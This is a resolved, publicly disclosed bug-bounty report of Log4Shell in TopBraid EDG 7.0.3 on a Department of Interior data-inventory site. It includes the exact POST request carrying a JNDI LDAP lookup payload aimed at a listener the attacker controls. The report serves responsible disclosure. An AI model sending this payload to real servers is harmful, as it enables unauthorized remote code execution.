Summary by aminei
Log4Shell in TopbraidEDG before version 7.0.4 when a security filter is turned off.
Log4Shell (CVE-2021-44228)
Disclosed by aminei- Program Department of Interior: Vulnerability Disclosure Program
- Disclosed date over 2 years ago
- Priority P1 Bugcrowd's VRT priority rating
- Status Resolved This vulnerability has been accepted and fixed
Report details
-
Submitted
-
Target Location
*.doi.gov -
Target category
Web App
-
VRT
Server-Side Injection > Remote Code Execution (RCE) -
Priority
P1 -
Bug URL
https://datainventory.doi.gov/explorer/tbl/swp -
Description
Overview
Log4Shell is exploitable in datainventory.doi.gov which uses TopBraid EDG 7.0.3. This version is vulnerable to Log4Shell. I managed to find a vulnerable endpoint with a working proof of concept.
Base score: 10
Vector:CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:HWalkthrough & PoC
First go to https://datainventory.doi.gov/explorer/ and click on "Enter explorer" to login as explorer.
Then setup a listener on port 22 on a server you control using for instance netcat:
Once logged in as explorer, send the following request using a proxy such as BurpSuite:
POST /explorer/tbl/swp HTTP/1.1 Host: datainventory.doi.gov Content-Type: application/x-www-form-urlencoded;charset=utf-8 Content-Length: 155 Cookie: browserCompatibility=checked; JSESSIONID=YOUR_JSESSIONID_COOKIE _viewClass=teamwork%3ACommentAndTaskCountService&resource=urn%3Ax-evn-master%3Awf_core_ent_nwcg_org&_base=http%3A%2F%2Frdfex.o${jndi:ldap://YOUR_IP:22}Please replace the IP in the
${jndi:ldap://YOUR_IP:22}with an IP you control and send the request. The datainventory server will succesfully query the endpoint.
I have not exploited the server further because it would lead to a remote code execution. I don't feel comfortable doing so on a US department of interior server without prior authorization.
Demonstrated Impact
An malicious attacker could obtain a shell via remote code execution on the server.